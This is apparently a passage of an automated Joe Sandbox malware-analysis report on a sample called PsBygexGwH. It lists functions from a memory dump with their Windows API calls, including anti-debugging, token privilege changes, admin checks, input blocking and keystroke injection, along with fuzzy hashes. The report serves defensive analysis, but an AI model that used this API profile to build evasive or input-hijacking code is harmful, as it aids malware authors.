Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 2035bdd71a8516253b7e4ac9ca3ef1438682701f452afa232fa0f7e97f9d5ba3
Instruction ID: e779623dca7de3d97eebdab8b009b3c9d5d182454de9e8144f6f2a4625b4b67f
Opcode Fuzzy Hash: 2035bdd71a8516253b7e4ac9ca3ef1438682701f452afa232fa0f7e97f9d5ba3
Instruction Fuzzy Hash: 2321AF715007059BDF30DF65D948BA77BFCEB50354F10442EE586D2551E770EE448BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00188298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 001882AA

Strings

(, xrefs: 001882F0
|, xrefs: 001882DA

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 0d25f3ff296d37f43d5f112b9a887fc3db645fc6efadf1b617b9a1e9e79a6927
Instruction ID: 44a529a391c755a513cc1d31dd708a5a99fb85923bfda1c19085c0ab6601009a
Opcode Fuzzy Hash: 0d25f3ff296d37f43d5f112b9a887fc3db645fc6efadf1b617b9a1e9e79a6927
Instruction Fuzzy Hash: 73323574A006059FCB28DF59C481A6AB7F0FF48710B55C56EE99ADB3A1EB70EA41CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00195C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00195CC1
FindNextFileW.KERNEL32(00000000,?), ref: 00195D17
FindClose.KERNEL32(?), ref: 00195D5F

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 3a161e70d9b8936106f35ba0ab273e89d26646817fbb679a76a8876eda172cc9
Instruction ID: a362da26d90981949ad2070108e8f3f26cd44a336d458b33a653406d647dbd3c
Opcode Fuzzy Hash: 3a161e70d9b8936106f35ba0ab273e89d26646817fbb679a76a8876eda172cc9
Instruction Fuzzy Hash: CF519734604A019FCB18CF68D498E9AB7E5FF09314F14855EE99A8B3A2CB30FD44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00152622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0015271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00152724
UnhandledExceptionFilter.KERNEL32(?), ref: 00152731

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 392857bd5ca7e7dd0a91c2dbbdb20f4839c45b460ede267a00a58f2cd147def1
Instruction ID: f397925927d94b7ab617e18341f97f55f857218b74c087237832fa348e42f402
Opcode Fuzzy Hash: 392857bd5ca7e7dd0a91c2dbbdb20f4839c45b460ede267a00a58f2cd147def1
Instruction Fuzzy Hash: 7731B5759112289BCB21DF65DC89B9DB7B8BF18310F5042EAE81CA7261E7309F858F85

Uniqueness

Uniqueness Score: -1.00%

Function 001951CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 001951DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00195238
SetErrorMode.KERNEL32(00000000), ref: 001952A1

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: dbc4cbe5bb4a06644fa2b53f8ae70fab88f18df061d8e2d2cdb45ff7bfe236c2
Instruction ID: 815132e643078304f1075c2562d507da3b25f7925b57d82c89f941116037c83b
Opcode Fuzzy Hash: dbc4cbe5bb4a06644fa2b53f8ae70fab88f18df061d8e2d2cdb45ff7bfe236c2
Instruction Fuzzy Hash: CE314F75A00518DFDB00DF58D884EADBBF5FF49314F088099E905AB3A2DB31E855CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001816C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 0013FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00140668
Part of subcall function 0013FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00140685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0018170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0018173A
GetLastError.KERNEL32 ref: 0018174A

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 14f59b362164870bc0fe37c0a4c3f2e5d05b86f30372f463859f73b42939aecb
Instruction ID: 4a7a3253c4f1d31ce5000f3d2b71d800113a2d00a819125171f4ff2fc8ee7a30
Opcode Fuzzy Hash: 14f59b362164870bc0fe37c0a4c3f2e5d05b86f30372f463859f73b42939aecb
Instruction Fuzzy Hash: DD118FB2804204BFD718AF54DCC6D6BB7BDEB44714B20852EF05656641EB70BD428B60

Uniqueness

Uniqueness Score: -1.00%

Function 0018D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0018D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0018D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0018D650

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 7e81cb8f164363459a962e05798c6dc1ede7116b83ca128798bdd6c788f954dd
Instruction ID: e5fc82969249dba9dd82f77090a8ea5a1c48332e757b71054a05e50dbc936541
Opcode Fuzzy Hash: 7e81cb8f164363459a962e05798c6dc1ede7116b83ca128798bdd6c788f954dd
Instruction Fuzzy Hash: D7113C75E05228BBDB109F99AC45FAFBBBCEB45B50F108165F904E7290D7704A058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00181663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0018168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 001816A1
FreeSid.ADVAPI32(?), ref: 001816B1

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 92ce790589831309ea4204981b9e28560b790c70c1aa7bd6bc36d959d1912db1
Instruction ID: bf2bc4cc9cb81b1205d73383998e93cc6872196c53a2a7017b915853cfd065da
Opcode Fuzzy Hash: 92ce790589831309ea4204981b9e28560b790c70c1aa7bd6bc36d959d1912db1
Instruction Fuzzy Hash: DEF0F475950309FBDB00EFE49C89AAEBBBCFB08604F504565F501E2181E774AA448BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00144CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(001528E9,?,00144CBE,001528E9,001E88B8,0000000C,00144E15,001528E9,00000002,00000000,?,001528E9), ref: 00144D09
TerminateProcess.KERNEL32(00000000,?,00144CBE,001528E9,001E88B8,0000000C,00144E15,001528E9,00000002,00000000,?,001528E9), ref: 00144D10
ExitProcess.KERNEL32 ref: 00144D22

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 0f873a0014678214bd9e15702efd001de2e42ba7ce93d948ae4ac31adfcac7c9
Instruction ID: 43b5ed85a33bd6ec6ae69aed4394d564b53066c380a18414e738aae84f8ad8ad
Opcode Fuzzy Hash: 0f873a0014678214bd9e15702efd001de2e42ba7ce93d948ae4ac31adfcac7c9
Instruction Fuzzy Hash: 6BE0B631400148ABCF11AF94DD09A583BA9FB61781B504118FC199B532CB35DE82CA80

Uniqueness

Uniqueness Score: -1.00%

Function 0017D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0017D28C

Strings

X64, xrefs: 0017D2A8

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 8083bb1872d50a071596c1e30f534ffc844add43892cfe2b308859fdeafdb166
Instruction ID: 58307c09aa05782779e1b1cda2c68a03a2ac4a041f45fb5ecdf200f93136d291
Opcode Fuzzy Hash: 8083bb1872d50a071596c1e30f534ffc844add43892cfe2b308859fdeafdb166
Instruction Fuzzy Hash: 45D0CAB880112DEBCB98DBA0EC88DDEB3BCBB04305F104292F50AA2000DB3096898F20

Uniqueness

Uniqueness Score: -1.00%

Function 0014CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: 3846bd230a83d64b55642a663d285274888a038264f546b717da61cc04ebd6d5
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: E9023C71E012199FDF54CFA9C8806AEFBF1EF98314F25816AD819E7390D731AA418BC0

Uniqueness

Uniqueness Score: -1.00%

Function 001968EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00196918
FindClose.KERNEL32(00000000), ref: 00196961

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: ad60862d6533aa4714358047567f18915e5fdfef97ed4ca59de9f31ca909db72
Instruction ID: 525b821c35d1e7f83aa7e890bbe1516b8d34a51029f1e79b6f497aa0e96e80e4
Opcode Fuzzy Hash: ad60862d6533aa4714358047567f18915e5fdfef97ed4ca59de9f31ca909db72
Instruction Fuzzy Hash: AA1190316042109FCB10DF29D484A1ABBE5FF89328F14C699E4698F6A2C730EC45CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 001937B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,001A4891,?,?,00000035,?), ref: 001937E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,001A4891,?,?,00000035,?), ref: 001937F4

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 84f6c2b8c620aa5281738201ea3085f2c48c87997b464b023700da616784b71d
Instruction ID: cd230ec8e77a8dc2450f37d476c7930057f794b9d83113f89f0c960730cbc5df
Opcode Fuzzy Hash: 84f6c2b8c620aa5281738201ea3085f2c48c87997b464b023700da616784b71d
Instruction Fuzzy Hash: ECF0E5B06042282AEB2017A69C4DFEB3AAEEFC4761F000265F509D2291DB609944C6F0

Uniqueness

Uniqueness Score: -1.00%

Function 0018B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0018B25D
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0018B270

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 163e130068960287cadb5ac97a0a7111e2f33c0fa831bf7107b78e17b0fd7bfd
Instruction ID: cad6b3454081e8d8c44b810cc3f891b73ea0b8aeee5bbe3df326446f66a6abc0
Opcode Fuzzy Hash: 163e130068960287cadb5ac97a0a7111e2f33c0fa831bf7107b78e17b0fd7bfd
Instruction Fuzzy Hash: 16F01D7190428EABDB159FA4C805BEE7BB4FF04305F008019F955A5191C77996519F94

Uniqueness

Uniqueness Score: -1.00%

Function 001810BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001811FC), ref: 001810D4
CloseHandle.KERNEL32(?,?,001811FC), ref: 001810E9

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 92051503c3cc2d4036e47459178a0741623ea47ad5aa3023a8f2726fddc11cd6
Instruction ID: 61b2b7762770d4ea3e4452b9f15eeba87594be96debea47abf7fb8cf834fae7a
Opcode Fuzzy Hash: 92051503c3cc2d4036e47459178a0741623ea47ad5aa3023a8f2726fddc11cd6
Instruction Fuzzy Hash: 93E0BF72418610AFE7252B51FC09E7777E9EB04310F14892DF5A5804B5DB626CD1DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0012CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 00170C40

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.
API String ID: 0-1840281001
Opcode ID: af4b6761dc5c3bdcbece67c54031387ae47488ce8e9c60b4246232965f7a00d4
Instruction ID: 6cefd2a10dab6e803625ce2ea303896b610e2c12ad784e8c8071a88d22a040d7
Opcode Fuzzy Hash: af4b6761dc5c3bdcbece67c54031387ae47488ce8e9c60b4246232965f7a00d4
Instruction Fuzzy Hash: 4C32B170900328DFCF19DF94E981AEDB7B5FF19304F108059E90AAB292DB75AE55CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0015676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00156766,?,?,00000008,?,?,0015FEFE,00000000), ref: 00156998

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 8aa73c97dd24231093cf8f0760e4c2e2f67f5fe124fa704050b27b0f0d6ac94e
Instruction ID: 6bd881c4721d3dc923cce31f9bb39be517af0e2ac97cc57638b1ec1cae1a9e14
Opcode Fuzzy Hash: 8aa73c97dd24231093cf8f0760e4c2e2f67f5fe124fa704050b27b0f0d6ac94e
Instruction Fuzzy Hash: 93B16D31610608DFD719CF28C486B657BE0FF45366F658658ECA9CF2A2C335D999CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0013B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 0017851F

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 8f4ce0bd991bd10298d117874f8e0fabf10ff6abfeaded1d01b1e82c1cb0712a
Instruction ID: fb462d34d0efbf62e0b9da2e664b2ec2e0aeb1e776116bf3b3fd4ede14a550a8
Opcode Fuzzy Hash: 8f4ce0bd991bd10298d117874f8e0fabf10ff6abfeaded1d01b1e82c1cb0712a
Instruction Fuzzy Hash: 63125E71E042299BCB14CF58C881BEEB7F5FF48710F15819AE949EB255EB349E81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0019EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0019EABD

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 64cb8b9975b0676b3f5411ad1bab0a491e1463939831f16b78caa72fdbd166a6
Instruction ID: 5f2f7d4659029419db18c955daca9d8e3b8e7c7b20e7b64dcf76816c0cead671
Opcode Fuzzy Hash: 64cb8b9975b0676b3f5411ad1bab0a491e1463939831f16b78caa72fdbd166a6
Instruction Fuzzy Hash: 72E04F312002149FDB10EF59E844E9AF7E9AFA8760F048426FD49CB361DB70E8418BE0

Uniqueness

Uniqueness Score: -1.00%

Function 001409D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,001403EE), ref: 001409DA

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
